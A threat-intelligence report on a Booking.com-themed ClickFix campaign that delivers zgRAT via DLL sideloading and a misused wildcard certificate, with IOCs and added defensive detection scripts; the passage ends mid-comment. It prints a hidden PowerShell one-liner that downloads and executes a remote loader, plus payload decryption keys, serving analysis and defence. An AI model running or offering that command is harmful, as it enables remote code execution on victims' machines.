
Booking.com ClickFix Drops zgRAT via Stolen Dodo.com Wildcard Cert: Bulletproof Hosting, DLL Sideloading, and 14 Phishing Subdomains Targeting Hospitality

Published March 12, 2026

TL;DR: A three-wave malware campaign running since December 2025 impersonates Booking.com verification pages to trick hospitality sector victims into executing PowerShell. The attack chain delivers zgRAT with PureHVNC through DLL sideloading -- a legitimate psl.exe binary loads a trojanized 7MB libpsl-5.dll with 99 obfuscated exports. The payloads are signed with a stolen *.dodo.com wildcard certificate that carries CA:TRUE basic constraints, which effectively makes it a sub-CA certificate, now weaponized for code signing. The C2 infrastructure sits on AS208885, a freshly minted autonomous system registered to an individual in Tajikistan through the zanemint-mnt hosting broker -- a textbook bulletproof hosting arrangement with upstream transit through Lithuania and the UK, and Russian hosting ecosystem ties including cloudrix.ru. We mapped 12+ malware samples, 7 campaign domains, 14 phishing subdomains, 2 ASN prefixes covering 512 IPs, and a dual Go/.NET loader architecture that gives this operation unusual flexibility.


It Starts With a Fake Booking Confirmation

The victim is a hotel front desk manager in Italy. An email arrives -- Booking.com branding, Italian language, something about a guest verification that needs attention. The link leads to what looks like a standard Booking.com CAPTCHA page. "Please verify you are human."

Except the page is hosted on bklmain.online.hailmeinc[.]com -- one of 14 subdomains the operator has spun up on a single HostGator India IP, all designed to impersonate Booking.com's verification flow.

The ClickFix technique has become the dominant initial access vector in early 2026, and for good reason: it transfers the execution burden entirely to the victim. No exploit. No macro. No attachment. The user copies a PowerShell command and pastes it into their own terminal. Email gateways never see it. Browser sandboxes never trigger. The EDR sees a user-initiated PowerShell execution, which looks a lot like IT administration.

The 14 subdomains all follow the same pattern -- variations on "bklmain" (a clear abbreviation of "Booking Main") with different TLD-style suffixes:

Subdomain                          Pattern
bklmain.online.hailmeinc[.]com     Standard
bklmain.site.hailmeinc[.]com       Standard
bklmain.club.hailmeinc[.]com       Standard
bklmain.store.hailmeinc[.]com      Standard
bklmain.fun.hailmeinc[.]com        Standard
bklmain.shop.hailmeinc[.]com       Standard
bklmain.website.hailmeinc[.]com    Standard
bklmaint.xyz.hailmeinc[.]com       Typo variant
bkmmain.xyz.hailmeinc[.]com        Typo variant
bklnmain.xyz.hailmeinc[.]com       Typo variant
bklsmain.xyz.hailmeinc[.]com       Typo variant
bkmain.xyz.hailmeinc[.]com         Typo variant
blkmain.xyz.hailmeinc[.]com        Typo variant
bklmail.xyz.hailmeinc[.]com        Typo variant

The typo variants are interesting. They suggest the operator is either A/B testing which subdomain patterns evade URL filtering most effectively, or generating permutations to avoid domain-level blocklists. Either way, 14 subdomains for a single phishing theme on a single parent domain is aggressive.

All 14 resolve to 162.241.123.127 on HostGator India.
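The permutation pattern above is easy to hunt for mechanically. The following is an added example (not code from the report or from Breakglass Intelligence) that classifies hostnames by computing the edit distance between the leftmost label and the "bklmain" brand token, then flags any close match that sits on a parent domain other than the brand's own. The candidate list embeds the 14 subdomains from the report plus three constructed benign controls; the edit tolerance, the `LEGIT_PARENTS` set and the naive two-label registrable-domain rule are this example's own choices.

```python
# Added example, not from the report: flag hostnames whose leftmost label is an
# exact or near-permutation of a brand token sitting on a parent domain that
# does not belong to the brand. Names and thresholds are this example's choices.
from typing import List, Tuple

BRAND_TOKENS = ("bklmain",)          # "Booking Main" abbreviation seen in the campaign
LEGIT_PARENTS = {"booking.com"}      # parent domains where the brand may legitimately appear
MAX_EDITS = 2                        # tolerance for typo variants

# Constructed candidate list: the 14 subdomains from the report plus three benign controls.
CANDIDATES = [
    "bklmain.online.hailmeinc[.]com", "bklmain.site.hailmeinc[.]com",
    "bklmain.club.hailmeinc[.]com", "bklmain.store.hailmeinc[.]com",
    "bklmain.fun.hailmeinc[.]com", "bklmain.shop.hailmeinc[.]com",
    "bklmain.website.hailmeinc[.]com", "bklmaint.xyz.hailmeinc[.]com",
    "bkmmain.xyz.hailmeinc[.]com", "bklnmain.xyz.hailmeinc[.]com",
    "bklsmain.xyz.hailmeinc[.]com", "bkmain.xyz.hailmeinc[.]com",
    "blkmain.xyz.hailmeinc[.]com", "bklmail.xyz.hailmeinc[.]com",
    "www.booking.com", "mail.example.com", "admin.booking.com",
]

def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition (blkmain -> bklmain)
    return d[len(a)][len(b)]

def refang(host: str) -> str:
    """Turn a defanged name like 'x[.]com' back into 'x.com' for comparison."""
    return host.replace("[.]", ".").strip(".").lower()

def registrable_domain(host: str) -> str:
    """Last two labels; adequate for the .com/.org names handled here (no Public Suffix List lookup)."""
    return ".".join(host.split(".")[-2:])

def classify(host: str) -> Tuple[str, str]:
    """Return (verdict, reason) for one hostname."""
    h = refang(host)
    leftmost = h.split(".")[0]
    parent = registrable_domain(h)
    if parent in LEGIT_PARENTS:
        return "benign", "brand on its own registrable domain"
    for token in BRAND_TOKENS:
        edits = osa_distance(leftmost, token)
        if edits == 0:
            return "suspicious", f"exact token '{token}' on foreign parent {parent}"
        if edits <= MAX_EDITS:
            return "suspicious", f"'{leftmost}' is {edits} edit(s) from '{token}' on foreign parent {parent}"
    return "benign", "no brand token within edit tolerance"

def suspicious_hosts(hosts: List[str]) -> List[str]:
    """All hostnames classified as suspicious, defanged form preserved for reporting."""
    return [h for h in hosts if classify(h)[0] == "suspicious"]

if __name__ == "__main__":
    for host in CANDIDATES:
        verdict, reason = classify(host)
        print(f"{verdict:10} {host:35} {reason}")
```

Run against passive-DNS or proxy logs, the same routine catches the next round of permutations without a per-subdomain blocklist; raise `MAX_EDITS` only with care, since short tokens start colliding with legitimate labels quickly.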

The PowerShell Kill Chain: From Clipboard to Full Compromise

Once the victim pastes the ClickFix command, the infection chain unfolds across four stages, each serving a distinct evasion purpose.

[1] SPAM (Italian, Booking.com themed)
     |
     v
[2] CLICKFIX PAGE (bklmain.*.hailmeinc.com)
     |-- Fake CAPTCHA/verification
     |-- Copies PowerShell to clipboard
     v
[3] STAGE 0: ads.ps1 (167 bytes)
     |-- One-liner: IEX download from buqiwptshpqisy.com
     v
[4] STAGE 1: Full PS1 Loader (~10KB)
     |-- Fingerprints victim (user, PC, OS, AV, admin)
     |-- Reports to seomorry.com/tituqs (tracking)
     |-- Downloads ZIP from empowerhouseproject.org
     |-- Extracts to hidden AppData folder
     |-- Adds HKCU\...\Run persistence
     |-- Executes payload
     v
[5] STAGE 2: ZIP PACKAGE
     |-- psl.exe (legitimate PSL utility, 70KB)
     |-- libpsl-5.dll (trojanized, 7MB, 99 exports)
     |-- MSYS2 DLLs (legitimate cover)
     v
[6] DLL SIDELOADING: psl.exe loads libpsl-5.dll
     v
[7] PAYLOAD: zgRAT + PureHVNC
     |-- .NET Reactor + Eazfuscator obfuscation
     |-- TripleDES-CBC + GZip encrypted inner payload
     |-- C2: asmweosiqsaaw.com (95.85.244.166)
     v
[8] ACTIONS: Remote access, screen control, credential theft

Stage 0: The 167-Byte Trigger

The initial payload is almost comically small:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "iex ((New-Object Net.WebClient).DownloadString('https://buqiwptshpqisy[.]com/jsyqi20458aq'))"

One hundred sixty-seven bytes. That is the entire initial payload -- a one-liner that downloads and executes the real loader. The -WindowStyle Hidden flag ensures the victim never sees a PowerShell window. This is the payload that gets copied to the clipboard from the ClickFix page.
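The recommendations later in this report ask defenders to search EDR/SIEM telemetry for exactly this shape of command line. The following is an added example (not code from the report) that scores PowerShell process-creation events for the hidden-window, policy-bypass, IEX and download-cradle markers seen in the one-liner, extracts any URL host, and checks it against the staging domains the report names. The JSON-lines log, hostnames and field names (`ts`, `host`, `user`, `image`, `cmdline`) are constructed for the example; the parameter abbreviations matched by the regexes are heuristics, not an exhaustive list.

```python
# Added example, not from the report: score PowerShell process-creation events for
# the download-cradle pattern shown above. Log format and hostnames are constructed;
# field names (ts, host, user, image, cmdline) are this example's own.
import json
import re
from typing import Dict, List

# Staging domains named in the report, stored defanged and compared refanged.
STAGING_DOMAINS = {"buqiwptshpqisy[.]com", "wiosyrondaty[.]com", "empowerhouseproject[.]org"}

# Constructed JSON-lines events. The first mirrors the stage 0 one-liner; the others are
# ordinary administrative use that must not alert at the same level.
SAMPLE_LOG = r'''
{"ts":"2026-03-05T10:14:02Z","host":"FD-PC01","user":"reception","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command \"iex ((New-Object Net.WebClient).DownloadString('https://buqiwptshpqisy.com/jsyqi20458aq'))\""}
{"ts":"2026-03-05T10:20:11Z","host":"IT-ADMIN","user":"itadmin","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -NoProfile -Command Get-Service -Name Spooler"}
{"ts":"2026-03-05T10:25:40Z","host":"IT-ADMIN","user":"itadmin","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -ep bypass -File C:\\scripts\\deploy.ps1"}
'''

# Heuristic markers; PowerShell accepts abbreviated parameter names, so the regexes allow them.
INDICATORS = {
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":     re.compile(r"-e(?:x|xecutionpolicy|p)?\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle":   re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", re.I),
}
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def refang(domain: str) -> str:
    return domain.replace("[.]", ".").lower()

def score_event(event: Dict) -> Dict:
    """Return the event annotated with matched indicators, contacted hosts and a verdict."""
    cmd = event.get("cmdline", "")
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    domains = {m.lower() for m in URL_RE.findall(cmd)}
    known = domains & {refang(d) for d in STAGING_DOMAINS}
    if known:
        matched.append("known_staging_domain")
    if known or len(matched) >= 3:
        verdict = "malicious"      # known staging host, or the full cradle shape
    elif matched:
        verdict = "review"         # a single marker: common in legitimate administration
    else:
        verdict = "benign"
    return {**event, "indicators": matched, "domains": sorted(domains), "verdict": verdict}

def analyze(log_text: str) -> List[Dict]:
    """Parse JSON-lines process events and score each one."""
    return [score_event(json.loads(line)) for line in log_text.strip().splitlines() if line.strip()]

if __name__ == "__main__":
    for r in analyze(SAMPLE_LOG):
        print(r["verdict"], r["host"], r["indicators"], r["domains"])
```

The verdict tiers matter in practice: `-ExecutionPolicy Bypass` on its own is everyday administration, so it only lands in "review", while the combination of hidden window, bypass, IEX and a download cradle is the ClickFix shape and is escalated regardless of whether the host is already on a blocklist.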

Stage 1: The Fingerprinting Loader

The downloaded PowerShell script is roughly 10KB and substantially more sophisticated. Before it ever touches a payload, it profiles the victim:

  • Username and hostname
  • OS version and PC model/manufacturer
  • PowerShell version
  • Admin status
  • Installed antivirus products

All of this telemetry gets sent to seomorry[.]com/tituqs with a hardcoded tracking UUID (b15f31a4-487b-4b46-b59d-98ac0c873c61). This is not just a delivery mechanism -- it is a targeting pipeline. The operator can see exactly who is getting infected, what AV they are running, and whether they have admin access, before the actual malware is even deployed.

The loader also includes sandbox evasion via benign API calls. It contacts httpbin.org, catfact.ninja, boredapi.com, and adviceslip.com with random sleep intervals -- legitimate API traffic designed to make the execution profile look normal to automated analysis systems.

Once satisfied that the environment is real, the loader downloads a ZIP from empowerhouseproject[.]org, extracts it to a hidden folder in the user's AppData hierarchy (trying five different paths), sets a registry Run key for persistence, and launches the payload.
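The benign-API evasion described above leaves a correlatable trace: several otherwise harmless DNS lookups clustered shortly after a PowerShell start on the same host, which is the hunt the report's short-term recommendations call for. The following is an added example (not code from the report) that performs that temporal correlation. The event tuples, hostnames and timestamps are constructed; the 120-second window and the two-distinct-domains threshold are this example's assumptions, and the decoy domain list is the one the report names.

```python
# Added example, not from the report: correlate benign-looking API lookups with a
# preceding PowerShell start on the same host. Event format, hostnames and timestamps
# are constructed; the decoy domain list is the one the report names.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

DECOY_DOMAINS = {"httpbin.org", "catfact.ninja", "boredapi.com", "adviceslip.com"}
WINDOW = timedelta(seconds=120)   # how long after a PowerShell start lookups still count (assumption)
MIN_DISTINCT = 2                  # distinct decoy domains needed before alerting (assumption)

# Constructed events: (timestamp, host, kind, value). kind is "process" (image name)
# or "dns" (queried name).
EVENTS: List[Tuple[str, str, str, str]] = [
    ("2026-03-05T10:14:02Z", "FD-PC01", "process", "powershell.exe"),
    ("2026-03-05T10:14:09Z", "FD-PC01", "dns", "httpbin.org"),
    ("2026-03-05T10:14:23Z", "FD-PC01", "dns", "catfact.ninja"),
    ("2026-03-05T10:14:41Z", "FD-PC01", "dns", "adviceslip.com"),
    ("2026-03-05T11:02:00Z", "DEV-BOX", "dns", "httpbin.org"),      # developer test, no PowerShell start
    ("2026-03-05T12:00:00Z", "HR-PC03", "process", "powershell.exe"),
    ("2026-03-05T12:03:30Z", "HR-PC03", "dns", "catfact.ninja"),    # single domain, outside the window
]

def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def correlate(events: List[Tuple[str, str, str, str]]) -> Dict[str, List[str]]:
    """Return {host: sorted decoy domains} for hosts that meet the threshold."""
    starts: Dict[str, List[datetime]] = defaultdict(list)
    lookups: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, host, kind, value in events:
        t = parse_ts(ts)
        if kind == "process" and value.lower() == "powershell.exe":
            starts[host].append(t)
        elif kind == "dns" and value.lower() in DECOY_DOMAINS:
            lookups[host].append((t, value.lower()))
    alerts: Dict[str, List[str]] = {}
    for host, start_times in starts.items():
        hit = set()
        for t0 in start_times:
            for t, domain in lookups.get(host, []):
                if t0 <= t <= t0 + WINDOW:       # lookup inside the post-start window
                    hit.add(domain)
        if len(hit) >= MIN_DISTINCT:
            alerts[host] = sorted(hit)
    return alerts

if __name__ == "__main__":
    for host, domains in correlate(EVENTS).items():
        print(f"{host}: decoy API lookups after PowerShell start: {', '.join(domains)}")
```

The lone developer lookup and the single out-of-window query are deliberately left unflagged: the signal is the cluster of unrelated public APIs appearing together right after an interactive PowerShell launch, not any one of these domains.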

The DLL Sideloading Package: Hiding in Plain Sight

The ZIP package is where this campaign gets clever.

Component       Size      Purpose
psl.exe         70KB      Legitimate PSL (Public Suffix List) utility
libpsl-5.dll    7MB       Trojanized DLL -- the actual malware
10 MSYS2 DLLs   Various   Legitimate cover libraries (libiconv, libidn2, libintl, etc.)

The attack exploits DLL search order hijacking. When psl.exe starts, it imports libpsl-5.dll -- a library it legitimately depends on. But instead of loading the real libpsl library, it loads the attacker's 7MB trojanized version sitting in the same directory.

The trojanized DLL has 99 exported functions, all with randomized names like 145cmSBLdUbJI0CMGum and 1pCFOJ6M4xoy. The 10 legitimate MSYS2 libraries (libiconv-2.dll, libidn2-0.dll, libintl-8.dll, libunistring-5.dll, and their msys equivalents) exist solely to make the package look like a legitimate developer tool distribution -- a directory full of recognizable open-source libraries alongside a small utility binary.

This is a textbook sideloading setup, and it works well because psl.exe is a legitimate, signed binary. EDR products that rely on process reputation will see a known-good executable loading a DLL from its own directory -- normal behavior.
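Because process reputation does not help here, the practical hunt is for the package itself: the psl.exe plus libpsl-5.dll pair sitting in a user-writable directory, export names that no compiler would emit, and the Run key and directory patterns listed under Behavioral Indicators later in this report. The following is an added example (not code from the report) that applies those three checks to a constructed file inventory, registry snapshot and export list. The SHA-256 values are the ones the report publishes; the placeholder hashes for the cover DLLs and the benign MSYS2 install path are constructed, and the "machine-generated name" heuristic is this example's own.

```python
# Added example, not from the report: host-side hunt for the sideloading package
# described above and the persistence artifacts listed under Behavioral Indicators.
# The file inventory, registry values and export list are constructed; hashes are
# the ones the report publishes.
import re
from typing import Dict, List, Tuple

KNOWN_HASHES = {
    "96db67104f1f0eb37e33097fa679c9e42f606be0455b55a7af4319e345c66124": "psl.exe (legitimate sideloader)",
    "26f7c34675ba7a4e68a8fedf7b1ec903ff55b07ac0344d8ba8c689510a965bfd": "libpsl-5.dll (trojanized)",
}
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\")
RUN_NAME_RE = re.compile(r"^p8gx4zwgxrd9m", re.I)            # Run value name pattern from the report
INSTALL_DIR_RE = re.compile(r"uhwy97krbc_n5_upd_q8leg", re.I)  # installation directory pattern from the report

# Constructed inventory: (path, sha256). Hashes for the MSYS2 cover DLL and the benign
# developer install are placeholders.
FILES: List[Tuple[str, str]] = [
    (r"C:\Users\reception\AppData\Local\uhwy97krbc_n5_upd_q8legAB12\psl.exe",
     "96db67104f1f0eb37e33097fa679c9e42f606be0455b55a7af4319e345c66124"),
    (r"C:\Users\reception\AppData\Local\uhwy97krbc_n5_upd_q8legAB12\libpsl-5.dll",
     "26f7c34675ba7a4e68a8fedf7b1ec903ff55b07ac0344d8ba8c689510a965bfd"),
    (r"C:\Users\reception\AppData\Local\uhwy97krbc_n5_upd_q8legAB12\libiconv-2.dll", "0" * 64),
    (r"C:\msys64\usr\bin\psl.exe", "1" * 64),          # genuine developer install: expected location
    (r"C:\msys64\usr\bin\libpsl-5.dll", "2" * 64),
]
RUN_VALUES: Dict[str, str] = {
    "p8gx4zwgxrd9m_csq_oTK66Q": r"C:\Users\reception\AppData\Local\uhwy97krbc_n5_upd_q8legAB12\psl.exe",
    "OneDrive": r"C:\Users\reception\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
EXPORTS = ["145cmSBLdUbJI0CMGum", "1pCFOJ6M4xoy", "psl_is_public_suffix", "psl_latest"]

def find_sideload_pairs(files: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Directories holding both psl.exe and libpsl-5.dll, with risk notes per directory."""
    by_dir: Dict[str, Dict[str, str]] = {}
    for path, digest in files:
        directory, _, name = path.rpartition("\\")
        by_dir.setdefault(directory, {})[name.lower()] = digest
    results = []
    for directory, names in by_dir.items():
        if "psl.exe" in names and "libpsl-5.dll" in names:
            notes = []
            if any(marker in directory.lower() + "\\" for marker in USER_WRITABLE):
                notes.append("pair in user-writable directory")
            for name in ("psl.exe", "libpsl-5.dll"):
                if names[name] in KNOWN_HASHES:
                    notes.append(f"{name} matches IOC: {KNOWN_HASHES[names[name]]}")
            results.append((directory, notes))
    return results

def suspicious_exports(names: List[str]) -> List[Tuple[str, str]]:
    """Export names that cannot be C identifiers or look machine-generated (heuristic)."""
    out = []
    for n in names:
        if n[:1].isdigit():
            out.append((n, "starts with a digit"))
        elif ("_" not in n and any(c.isdigit() for c in n)
              and any(c.isupper() for c in n) and any(c.islower() for c in n)):
            out.append((n, "mixed-case alphanumeric with no separators"))
    return out

def suspicious_run_values(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Run values whose name or target path matches the campaign patterns."""
    return [(name, data) for name, data in values.items()
            if RUN_NAME_RE.search(name) or INSTALL_DIR_RE.search(data)]

def hunt() -> Dict[str, list]:
    return {
        "sideload_pairs": find_sideload_pairs(FILES),
        "exports": suspicious_exports(EXPORTS),
        "run_keys": suspicious_run_values(RUN_VALUES),
    }

if __name__ == "__main__":
    for section, hits in hunt().items():
        print(section, hits)
```

The benign MSYS2 pair is reported with an empty note list rather than suppressed, which is the point of the check: the same two file names are legitimate in a developer toolchain directory and only become an indicator when they appear under AppData or Temp, or when the hashes match the published IOCs.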

Dual Architecture: Go Meets .NET Reactor

Here is where this campaign diverges from the typical commodity stealer operation. The actor maintains two completely separate loader frameworks for the same final payload:

The Go DLL (Wave 3, March 2026)

Attribute      Value
SHA-256        137326ac5fc9...35d2
Size           10.7 MB
Compiler       Go 1.24.5 with CGo bindings
Module         arlington/
Source files   main.go, accessory.go, collaborative.go, experience.go, investors.go, manhattan.go, necessity.go, portraits.go, stockholm.go
Exports        GetInstallDetailsPayload, SignalInitializeCrashReporting
Signing        Stolen *.dodo[.]com wildcard certificate
Timestamp      Zeroed (1970-01-01) -- deliberate anti-forensics

The Go module is named "arlington" and its source files read like a random word generator hit a thesaurus: accessory.go, collaborative.go, experience.go, investors.go, manhattan.go. This is not a human naming files. It is automated obfuscation designed to make each build look different while maintaining the same codebase.

The exports -- GetInstallDetailsPayload and SignalInitializeCrashReporting -- are designed to mimic legitimate installer and crash reporting frameworks. If an analyst glances at the export table, it looks like a mundane software component.

The .NET Reactor Crypter (Parallel Delivery)

Attribute       Value
SHA-256         a8d214b32d8d...f44
Size            748 KB
Assembly        Zftgbtgff
Framework       .NET 4.x
Obfuscation     .NET Reactor + Eazfuscator (dual-layer)
Timestamp       2060-04-11 (stomped)
.text entropy   7.996 (near-maximum -- heavy encryption)

The .NET variant takes a different approach to evasion: dual-layer obfuscation. .NET Reactor handles the outer packing and control flow obfuscation, while Eazfuscator encrypts all strings. The inner payload is encrypted with TripleDES-CBC:

Algorithm:  TripleDES-CBC
Key (B64):  lh6OkPL1oZYmVVWK8rovvQ== (16 bytes, extended to 24)
IV (B64):   +Co+EjlbnIo= (8 bytes)
Compression: GZip after decryption
Resource:    "Hcszik" (encrypted payload in .NET managed resource)
Password:    "So0rqvBxLb" (key derivation salt)

After decryption and decompression, the inner payload is zgRAT with PureHVNC -- full remote desktop control, credential theft from browsers and email clients, and persistent access.

The dual-architecture approach is significant. If a defender writes detection for the Go variant, the .NET variant slips through, and vice versa. The operator is hedging their bets with two entirely different evasion strategies converging on the same final payload and C2.

The Stolen Certificate: How a Wildcard SSL Became a Code Signing Weapon

This is one of the more unusual findings in the investigation.

The Go DLL is signed with a certificate for *.dodo.com -- a wildcard SSL/TLS certificate issued by GlobalSign RSA OV SSL CA 2018. But it is being used for code signing.

Attribute           Value
Subject             CN=*.dodo.com
Issuer              GlobalSign RSA OV SSL CA 2018
Serial              60F33E3BFC90BB4181EE461E
Valid               2025-10-02 to 2026-11-03
Key                 RSA 4096-bit
Key Usage           Digital Signature, Certificate Sign (CRITICAL)
Basic Constraints   CA:TRUE (CRITICAL)

The CA:TRUE flag and Certificate Sign key usage make this a sub-CA certificate -- not a standard leaf certificate. This means it has the authority to sign other certificates, which is why it can be (ab)used for code signing. A normal wildcard SSL certificate cannot sign code. This one can, because it was issued with intermediate CA capabilities.

There are two explanations: either this certificate was stolen from dodo.com's infrastructure (where it may have been used as an internal sub-CA), or it was fraudulently issued by GlobalSign. Either way, it is now signing malware and needs to be revoked.
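The attributes in the table above are exactly what a signing-trust policy should be checking before a signature on a binary is accepted. The following is an added example (not code from the report) that parses the text form produced by `openssl x509 -noout -text` and returns every reason the certificate must be rejected as a code signer: a blocked serial, CA:TRUE on what is being used as a leaf, a Certificate Sign key usage, no Code Signing EKU, and a wildcard TLS subject. The certificate text is constructed from the attributes the report lists; the Extended Key Usage line is an assumption, since the report does not quote the EKU, and the policy rules are this example's own.

```python
# Added example, not from the report: parse `openssl x509 -noout -text` output and apply a
# code-signing trust policy. The text below is constructed from the attributes the report
# lists; the Extended Key Usage line is an assumption (the report does not quote the EKU).
import re
from typing import Dict, List

BLOCKED_SERIALS = {"60F33E3BFC90BB4181EE461E"}   # serial published in the report

CERT_TEXT = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            60:f3:3e:3b:fc:90:bb:41:81:ee:46:1e
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = GlobalSign RSA OV SSL CA 2018
        Validity
            Not Before: Oct  2 00:00:00 2025 GMT
            Not After : Nov  3 23:59:59 2026 GMT
        Subject: CN = *.dodo.com
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Certificate Sign
            X509v3 Basic Constraints: critical
                CA:TRUE
            X509v3 Extended Key Usage:
                TLS Web Server Authentication, TLS Web Client Authentication
"""

EXT_HEADER = re.compile(r"^(\s*)X509v3 (.+?):(\s*critical)?\s*$")

def parse_x509_text(text: str) -> Dict:
    """Minimal reader for the fields a signing policy needs; extensions keyed by name."""
    cert: Dict = {"serial": "", "subject": "", "issuer": "", "extensions": {}}
    lines = text.splitlines()
    current = None          # name of the extension whose value lines we are collecting
    current_indent = 0
    for i, line in enumerate(lines):
        stripped = line.strip()
        m = EXT_HEADER.match(line)
        if m and m.group(2) != "extensions":          # skip the "X509v3 extensions:" section header
            current = m.group(2)
            current_indent = len(m.group(1))
            cert["extensions"][current] = {"critical": bool(m.group(3)), "values": []}
            continue
        if current and stripped and line.startswith(" " * (current_indent + 1)):
            cert["extensions"][current]["values"].extend(v.strip() for v in stripped.split(","))
            continue
        current = None
        if stripped.startswith("Serial Number:"):
            rest = stripped[len("Serial Number:"):].strip()
            raw = rest.split()[0] if rest else lines[i + 1].strip()   # long serials wrap to the next line
            cert["serial"] = raw.replace(":", "").upper()
        elif stripped.startswith("Subject:"):
            cert["subject"] = stripped[len("Subject:"):].strip()
        elif stripped.startswith("Issuer:"):
            cert["issuer"] = stripped[len("Issuer:"):].strip()
    return cert

def evaluate_for_code_signing(cert: Dict) -> List[str]:
    """Reasons this certificate must not be trusted to sign code. Empty list means acceptable."""
    ext = cert["extensions"]
    findings = []
    if cert["serial"] in BLOCKED_SERIALS:
        findings.append("serial is on the block list")
    if "CA:TRUE" in ext.get("Basic Constraints", {}).get("values", []):
        findings.append("Basic Constraints CA:TRUE: sub-CA capability on a certificate used as a leaf")
    if "Certificate Sign" in ext.get("Key Usage", {}).get("values", []):
        findings.append("Key Usage includes Certificate Sign")
    if "Code Signing" not in ext.get("Extended Key Usage", {}).get("values", []):
        findings.append("no Code Signing EKU: not a code-signing certificate")
    if cert["subject"].replace(" ", "").startswith("CN=*."):
        findings.append("wildcard TLS subject used as a signer identity")
    return findings

if __name__ == "__main__":
    parsed = parse_x509_text(CERT_TEXT)
    print(parsed["subject"], parsed["serial"])
    for reason in evaluate_for_code_signing(parsed):
        print(" -", reason)
```

Each rule stands alone, so a serial-based block still fires after the actor rotates to a different stolen certificate only if the structural rules do; that is why the CA:TRUE, Certificate Sign and missing-EKU checks are there in addition to the block list.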

Bulletproof Hosting: Following the Infrastructure Down the Rabbit Hole

The primary C2 domain asmweosiqsaaw[.]com resolves to 95.85.244.166, which belongs to AS208885 -- and this is where the investigation gets interesting.

Tier 0 (Transit):
  AS61272 IST-AS (Lithuania)
  AS213893 IPTR-AS (IPTransit Business LTD, UK)
       |
       v
Tier 1 (Backbone):
  zanemint-mnt (Hosting broker, manages 95.85.240-248.0/24 = 2,304+ IPs)
  Associates: cloudrix.ru (RU), 1Cent Host (SE/EE/FI/NL/DE)
       |
       v
Tier 2 (Operational):
  AS208885 NFS-AS ("Noyobzoda Faridduni Saidilhom", Tajikistan)
  Prefixes: 86.54.24.0/24 + 95.85.244.0/24 (512 IPs)
  Created: 2025-07-04
       |
       v
Tier 3 (Endpoint):
  95.85.244.166 -> asmweosiqsaaw.com (C2, behind Cloudflare)

AS208885 was created on July 4, 2025 -- barely eight months ago. It is registered to "Noyobzoda Faridduni Saidilhom" with a Tajikistan address and an Outlook email address. This has every hallmark of a shell identity: a newly created ASN in a jurisdiction with minimal cybercrime enforcement, registered to a single individual, managed by a third-party hosting broker.

The hosting broker -- zanemint-mnt -- manages over 2,304 IPs across the 95.85.240-248.0/24 range. Its associates include cloudrix.ru (Russian abuse contact) and 1Cent Host, a bargain-basement hosting operation scattered across Sweden, Estonia, Finland, the Netherlands, and Germany.

The admin contact on AS208885 reveals another thread: an "Ecode" entity with a Russian phone number (+79954346314) and a Kostroma, Russia address. Kostroma is a small city northeast of Moscow -- not the kind of place you typically find hosting ASN administrators, but exactly the kind of detail that connects the Tajikistan shell registration to its actual Russian operators.

OPSEC Failures: The Trail They Left Behind

For all its technical sophistication, this operation has a laundry list of operational security mistakes:

  1. Shared Cloudflare account: The johnny + princess NS pair links all campaign domains to a single Cloudflare account. One abuse report could burn the entire infrastructure.

  2. Hardcoded tracking UUID: The value b15f31a4-487b-4b46-b59d-98ac0c873c61 appears in every PowerShell loader variant across all three waves. It is the single strongest clustering indicator.

  3. RIPE registration chain: nfstj-mnt -> NFS33-RIPE -> "Noyobzoda Faridduni Saidilhom" + phone +992109389511. This chain is queryable by anyone with RIPE database access.

  4. zanemint-mnt broker link: The same RIPE maintainer object manages both the C2 /24 and adjacent hosting infrastructure, tying the operational network to the broader BPH ecosystem.

  5. Russian admin contact: The Ecode entity with the Kostroma address and Russian mobile number on AS208885 directly links the Tajikistan shell to Russian operations.

  6. Certificate serial reuse: The *.dodo.com cert serial 60F33E3BFC90BB4181EE461E appears in Certificate Transparency logs, making it trivially searchable.

  7. Go module codename: The "arlington" module name is consistent across builds. YARA rules targeting arlington/ in Go binaries will catch future samples.

  8. Reused MalwareBazaar tags: All samples carry tags that link them together. The actor is not compartmentalizing uploads.
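Two of the mistakes above (the shared Cloudflare NS pair in item 1 and the AS208885 prefixes behind item 4) turn directly into pivots that can be run on passive-DNS data. The following is an added example (not code from the report) that clusters domains by their name-server set to surface everything parked on the same Cloudflare account, and checks resolved IPs against the two /24 prefixes the report attributes to AS208885. The DNS records are constructed; the campaign domains, NS names, IPs and prefixes are those published in the report, and `newlure-example.net` and the placeholder name servers are hypothetical.

```python
# Added example, not from the report: pivot on the two infrastructure artifacts the OPSEC
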